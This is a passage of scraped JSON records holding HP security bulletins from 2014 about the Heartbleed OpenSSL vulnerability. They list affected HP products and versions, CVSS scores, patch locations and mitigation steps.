SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNNn1wACgkQ4B86/C0qfVm/sQCg+dFq6zytvlfYlmexvErif+Bg\r\nZooAnRDUeVqwXlt8KEGyQrnGheC43CH0\r\n=6WRm\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-04-20T00:00:00", "title": "[security bulletin] HPSBMU02999 rev.1 - HP Software Autonomy WorkSite Server (On-Premises Software), Running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-20T00:00:00", "id": "SECURITYVULNS:DOC:30480", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30480", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04249113\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04249113\r\nVersion: 2\r\n\r\nHPSBMU03009 rev.2 - HP CloudSystem Foundation and Enterprise Software v8.0\r\nrunning OpenSSL, Remote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-16\r\nLast Updated: 2014-05-01\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nThe .Heartbleed. vulnerability was detected in specific OpenSSL versions.\r\nOpenSSL is a 3rd party product that is embedded with some of HP Software\r\nproducts. This bulletin objective is to notify HP Software customers about\r\nproducts affected by the .Heartbleed. vulnerability.\r\n\r\nNOTE: The .Heartbleed. vulnerability (CVE-2014-0160) is a vulnerability found\r\nin the OpenSSL cryptographic software library. This weakness potentially\r\nallows disclosure of information that is normally protected by the SSL/TLS\r\nprotocol. The impacted products in the list below are vulnerable due to\r\nembedding OpenSSL standard release software.\r\n\r\nReferences: CVE-2014-0160, (SSRT101520)\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP CloudSystem Foundation and Enterprise version 8.0\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has addressed this vulnerability by issuing an update to the CloudSystem\r\nproduct download files. A new version of the CloudSystem Foundation component\r\nis provided, specified as version 8.01. All other CloudSystem download files\r\nremain at version 8.0. The combination of these files available at the link\r\nbelow make up the overall CloudSystem solution.\r\nThe Software Depot download location for CloudSystem Foundation and\r\nEnterprise update is:\r\n\r\nhttps://h20392.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumber\r\n=Z7550-63210\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 16 April 2014 Initial release\r\nVersion:2 (rev.2) - 30 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNhmpcACgkQ4B86/C0qfVk78QCg0vzPtB9E34/a5rhQ274UoqYS\r\nKJgAn3mXIarK3gINzgPWgbob0u5+kNnP\r\n=0lrM\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-05-02T00:00:00", "title": "[security bulletin] HPSBMU03009 rev.2 - HP CloudSystem Foundation and Enterprise Software v8.0 running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-05-02T00:00:00", "id": "SECURITYVULNS:DOC:30526", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30526", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n\r\nDocument ID: c04260456\r\nVersion: 2\r\n\r\nHPSBMU03017 rev.2 - HP Software Connect-IT running OpenSSL, Remote Disclosure\r\nof Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-21\r\nLast Updated: 2014-04-25\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP Software\r\nConnect-IT running OpenSSL. The Heartbleed vulnerability was detected in\r\nspecific OpenSSL versions. OpenSSL is a 3rd party product that is embedded\r\nwith some of HP Software products. This bulletin objective is to notify HP\r\nSoftware customers about products affected by the Heartbleed vulnerability.\r\n\r\nNote: The Heartbleed vulnerability (CVE-2014-0160) is a vulnerability found\r\nin the OpenSSL product cryptographic software library product. This weakness\r\npotentially allows disclosure of information protected, under normal\r\nconditions, by the SSL/TLS protocol. The impacted products appear in the list\r\nbelow are vulnerable due to embedding OpenSSL standard release software.\r\n\r\nReferences: CVE-2014-0160 (SSRT101528)\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Connect-IT 9.52 (including all patches), 9.53 (including all patches)\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has made the following software updates available for HP Software\r\nConnect-IT:\r\n\r\nHP Software Connect-IT for Windows:\r\n\r\nhttp://support.openview.hp.com/selfsolve/document/LID/HPCIT_00068\r\n\r\nHP Software Connect-IT for Linux:\r\n\r\nhttp://support.openview.hp.com/selfsolve/document/LID/HPCIT_00069\r\n\r\nHP recommends following Connect-IT guidelines including the following action\r\nitems:\r\n\r\nRevocation of the old key pairs that were just superseded\r\nChanging potentially affected passwords\r\nInvalidating all session keys and cookies\r\n\r\nBulletin Applicability:\r\n\r\nThis bulletin applies to each OpenSSL component that is embedded within the\r\nHP products listed in the security bulletin. The bulletin does not apply to\r\nany other 3rd party application (e.g. operating system, web server, or\r\napplication server) that may be required to be installed by the customer\r\naccording instructions in the product install guide.\r\n\r\nTo learn more about HP Software Incident Response, please visit http://www8.h\r\np.com/us/en/software-solutions/enterprise-software-security-center/response-c\r\nenter.html .\r\n\r\nSoftware updates are available from HP Software Support Online at\r\nhttp://support.openview.hp.com/downloads.jsp\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 21 April 2014 - Initial release\r\nVersion:2 (rev.2) - 25 April 2014 - Added links to Windows and Linux patches\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNae+UACgkQ4B86/C0qfVnanACfYri6ZfqCI5DCQ9BYtTFafBiY\r\nQz8AoJCnza5IXEegJ6CngyhCGfn4SGJI\r\n=t5NX\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-05-01T00:00:00", "title": "[security bulletin] HPSBMU03017 rev.2 - HP Software Connect-IT running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-05-01T00:00:00", "id": "SECURITYVULNS:DOC:30500", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30500", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04272594\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04272594\r\nVersion: 1\r\n\r\nHPSBMU03032 rev.1 - HP Virtual Connect Firmware Smart Components Installer\r\nSoftware running OpenSSL, Remote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-30\r\nLast Updated: 2014-04-30\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP Virtual\r\nConnect Firmware Smart Components installer software running OpenSSL. This is\r\nthe OpenSSL vulnerability known as "Heartbleed" which could be exploited\r\nremotely resulting in disclosure of information.\r\n\r\nNote: additional information regarding the OpenSSL "Heartbleed" vulnerability\r\nconcerning HP Servers products is available at the following HP Customer\r\nNotice:\r\n\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_n\r\na-c04239413\r\n\r\nReferences: CVE-2014-0160, SSRT101549\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Virtual Connect Firmware Smart Components installer impacted products and\r\nversions\r\n\r\nHP BladeSystem c-Class Virtual Connect Firmware, Ethernet plus 4/8Gb 20-port\r\nand 8Gb 24-port FC Edition Component for Windows v4.10 and v4.20 Smart\r\nComponents installer\r\n\r\nHP BladeSystem c-Class Virtual Connect Support Utility (VCSU) 1.9.0 for Linux\r\nand Windows\r\n\r\nHP Smart Update Manager (SUM) 6.0.0 through 6.3.0\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has addressed this vulnerability for the impacted HP Virtual Connect\r\nFirmware Smart Components Installer software in the following updates and/or\r\nHP Security Bulletins.\r\n\r\nHP SPP Component\r\n Update Version or HP Security Bulletin\r\n Software Update or Security Bulletin Location\r\n\r\nHP BladeSystem c-Class Virtual Connect Firmware, Ethernet plus 4/8Gb 20-port\r\nand 8Gb 24-port FC Edition Component for Windows Smart Components installer\r\n v4.10B\r\n http://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/psi/swdDetai\r\nls/?sp4ts.oid=4144085&spf_p.tpst=swdMain&spf_p.prp_swdMain=wsrp-navigationalS\r\ntate%3Didx%253D%257CswItem%253DMTX_da108a1f80f644f79d3dcc8b98%257CswEnvOID%25\r\n3D4168%257CitemLocale%253D%257CswLang%253D%257Cmode%253D%257Caction%253Ddrive\r\nrDocument&javax.portlet.begCacheTok=com.vignette.cachetoken&javax.portlet.end\r\nCacheTok=com.vignette.cachetoken\r\n\r\nHP BladeSystem c-Class Virtual Connect Firmware, Ethernet plus 4/8Gb 20-port\r\nand 8Gb 24-port FC Edition Component for Windows Smart Components installer\r\n v4.20B\r\n http://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/psi/swdDetai\r\nls/?sp4ts.oid=4144085&spf_p.tpst=swdMain&spf_p.prp_swdMain=wsrp-navigationalS\r\ntate%3Didx%253D%257CswItem%253DMTX_6c1bcbd3c5ae485cb936818973%257CswEnvOID%25\r\n3D4168%257CitemLocale%253D%257CswLang%253D%257Cmode%253D%257Caction%253Ddrive\r\nrDocument&javax.portlet.begCacheTok=com.vignette.cachetoken&javax.portlet.end\r\nCacheTok=com.vignette.cachetoken\r\n\r\nHP BladeSystem c-Class Virtual Connect Support Utility (VCSU)\r\n HPSBMU03023\r\n https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04264271\r\n\r\nHP Smart Update Manager (SUM)\r\n HPSBMU02997\r\n https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04239375\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 30 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNhgGgACgkQ4B86/C0qfVkpbACg9DSqL62MTf5m+QNI1XWC6nfs\r\nqBQAoP7ssN3H3Bu8IacvYEILcwWUNn3E\r\n=tCt+\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-05-02T00:00:00", "title": "[security bulletin] HPSBMU03032 rev.1 - HP Virtual Connect Firmware Smart Components Installer Software running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-05-02T00:00:00", "id": "SECURITYVULNS:DOC:30525", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30525", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04236102\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04236102\r\nVersion: 1\r\n\r\nHPSBMU02995 rev.1 - HP Software HP Service Manager, Asset Manager, UCMDB\r\nBrowser, Executive Scorecard, Server Automation, Diagnostics, LoadRunner,\r\nPerformance Center, "HeartBleed" OpenSSL Vulnerability, Remote Disclosure of\r\nInformation\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-11\r\nLast Updated: 2014-04-11\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nThe Heartbleed vulnerability was detected in specific OpenSSL versions.\r\nOpenSSL is a 3rd party product that is embedded with some of HP Software\r\nproducts. This bulletin objective is to notify HP Software customers about\r\nproducts affected by the Heartbleed vulnerability.\r\n\r\nNote: The Heartbleed vulnerability (CVE-2014-0160) is a vulnerability found\r\nin the OpenSSL product cryptographic software library product. This weakness\r\npotentially allows disclosure of information protected, under normal\r\nconditions, by the SSL/TLS protocol. The impacted products appear in the list\r\nbelow are vulnerable due to embedding OpenSSL standard release software.\r\n\r\nReferences: CVE-2014-0160 (SSRT101499)\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Product\r\n Impacted HP Product Versions\r\n Notes\r\n\r\nHP Service Manager\r\n v9.32, v9.33\r\n\r\nHP Asset Manager\r\n v9.40, v9.40 CSC\r\n\r\nHP UCMDB Browser\r\n\r\n APR enabled on Tomcat includes an affected OpenSSL version\r\n\r\nHP CIT (ConnectIT)\r\n v9.52, v9.53\r\n\r\nHP Executive Scorecard\r\n v9.40, v9.41\r\n\r\nHP Server Automation\r\n v10.00, v10.01\r\n\r\nHP Diagnostics\r\n v9.23, v9.23 IP1\r\n\r\nHP LoadRunner\r\n v11.52, v12.0\r\n Controller/load generator communication channel\r\n\r\nHP Performance Center\r\n v11.52, v12.0\r\n Controller/load generator communication channel\r\n\r\nImpacted Versions table\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP Software is working to address this vulnerability for all affected product\r\nversions. HP Software will release product specific security bulletins for\r\neach impacted product. Each bulletin will include a patch and/or mitigation\r\nguideline. HP will update this bulletin with references to security bulletins\r\nfor each product in the impacted versions table.\r\n\r\nNote: OpenSSL is an external product embedded in HP products.\r\n\r\nBulletin Applicability:\r\n\r\nThis bulletin applies to each OpenSSL component that is embedded within the\r\nHP products listed in the security bulletin. The bulletin does not apply to\r\nany other 3rd party application (e.g. operating system, web server, or\r\napplication server) that may be required to be installed by the customer\r\naccording instructions in the product install guide.\r\n\r\nTo learn more about HP Software Incident Response, please visit http://www8.h\r\np.com/us/en/software-solutions/enterprise-software-security-center/response-c\r\nenter.html .\r\n\r\nSoftware updates are available from HP Software Support Online at\r\nhttp://support.openview.hp.com/downloads.jsp\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 11 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNHUmgACgkQ4B86/C0qfVnJ0QCdHsWxy4zAHbs7fFx/+al24D/5\r\nhFYAn0AzeojK1hXP9Ky8v+kFeeglSrvP\r\n=ciWU\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-04-20T00:00:00", "title": "[security bulletin] HPSBMU02995 rev.1 - HP Software HP Service Manager, Asset Manager, UCMDB Browser, Executive Scorecard, Server Automation, Diagnostics, LoadRunner, Performance Center, "HeartBleed" OpenSSL Vulnerability, Remote Disclosure", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-20T00:00:00", "id": "SECURITYVULNS:DOC:30471", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30471", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04260637\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04260637\r\nVersion: 1\r\n\r\nHPSBST03000 rev.1 - HP StoreEver ESL G3 Tape Library and Enterprise Library\r\nLTO-6 Tape Drives running OpenSSL, Remote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-22\r\nLast Updated: 2014-04-22\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP StoreEver ESL\r\nG3 Tape Library and Enterprise Library LTO-6 Tape Drives running OpenSSL.\r\nThis is the OpenSSL vulnerability known as "Heartbleed" which could be\r\nexploited remotely resulting in disclosure of information.\r\n\r\nReferences: CVE-2014-0160, SSRT101513\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP StoreEver ESL G3 Tape Libraries with MCB rev 2 OpenSSL version1.0.1f for\r\nthe following firmware versions:\r\n\r\n671H_GS00601\r\n665H_GS12501\r\n663H_GS04601\r\n\r\nHP StoreEver ESL G3 Tape Libraries with MCB rev 1 Open SSL version 1.0.1e in\r\n655H firmware versions:\r\n\r\n655H_GS10201\r\n\r\nHP StoreEver Enterprise Library LTO-6 Tape Drives: all firmware versions.\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP is actively working to address this vulnerability for the impacted\r\nfirmware versions of HP StoreEver ESL G3 Tape Library and Enterprise Library\r\nLTO-6 Tape Drives. This bulletin will be revised when the software updates\r\nare released.\r\n\r\nHP recommends the following mitigation or workaround that can reduce the\r\nlikelihood of an attacker being able to exploit the "Heartbleed"\r\nvulnerability for the HP StoreEver ESL G3 Tape Library and the StoreEver\r\nEnterprise Library LTO-6 Tape Drives:\r\n\r\nThe following configuration options that allow access to the Heartbeat\r\nfunction in the vulnerable versions of OpenSSL are not enabled by default.\r\nVerify that the following options are "disabled" using the Tape Library GUI:\r\n\r\nSecure SMI-S\r\nCVTL User\r\n\r\nNote: disabling these features blocks the vulnerable OpenSSL function in both\r\nthe ESL G3 Tape Library and the StoreEver Enterprise Library LTO-6 Tape\r\nDrives. The basic functionality of the library is not affected by these\r\nconfiguration changes and SSL access to the user interface is not blocked by\r\nthese settings.\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 22 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party 